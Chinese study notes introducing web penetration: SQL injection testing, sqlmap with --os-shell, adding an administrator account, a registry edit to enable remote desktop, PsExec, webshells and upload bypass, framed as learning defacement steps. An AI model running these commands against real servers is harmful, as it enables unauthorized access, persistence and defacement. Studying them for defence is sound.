#学习笔记#WEB攻防与渗透技术（一）web安全概述

攻击网络服务器，远程控制机器，例如更换图片
SQL注入的漏洞，可以使用在url后加入语句 and 1=1/and 1=2来判断是否存在漏洞
服务器里的用户：两个禁用的，两个搭建网站用户，管理员用户
打开sqlmap文件夹，打开cmd命令行。
**攻击语句：**sqlmap.py -u “网页地址” --os-shell 获取系统shell

黑客常用的一些命令：
Net user 查看本机的用户列表
Net user “用户名” “密码” /add 添加用户
Net localgroup administratgors XXX /add 将XXX用户添加的administrators的组中。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal " " Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 修改注册表键值开启远程桌面3389端口。
进行桌面连接。
打开图片，记住图片链接，找到源文件夹，替换图片。
更隐蔽的方式：Psexec工具
Psexec \IP -u 用户名 -p 密码 cmd
这种方法相当于把*REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal " " Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 修改注册表键值开启远程桌面3389端口。*这一步略掉，不必开启3389号端口。
SQL注入工具
旁注WEB综合检测程序 Ver3.6修正版（09.10.14版）[黑客动画吧出品-明小子]
虽然已经过时，但是对于学习还是很有必要的。

XSS
XSS也加CSS，跨站脚本攻击。是指恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意攻击用户的特殊目的。
文件上传漏洞
允许用户上传的地方存在设计不严谨的地方漏洞，上传任意文件可能会让攻击者注入危险内容或恶意代码，并在服务器上运行。
绕过前台脚本检测扩展名上传WebShell，构造图片木马绕过。

WebShell
WebShell是Web入侵的脚本攻击工具。简单来说，WebShell就是一个asp或php木马后门，黑客在入侵了一个网站后，常常在将这些asp或php木马后门文件放置在网站服务器的web目录中，与整车的网页文件混在一起。然后黑客就可以用web的方式，通过asp或php木马后门控制网站服务器，包括上传下载文件、查看数据库、执行任意程序命令等。使用方法就是把asp或php木马放到对方web目录中然后在IE中输入www.xxx.com/muma.asp这样的相对路径来使用你安排好的木马。
提权就是通过获取低权限用户，再通过漏洞获得最高权限的过程。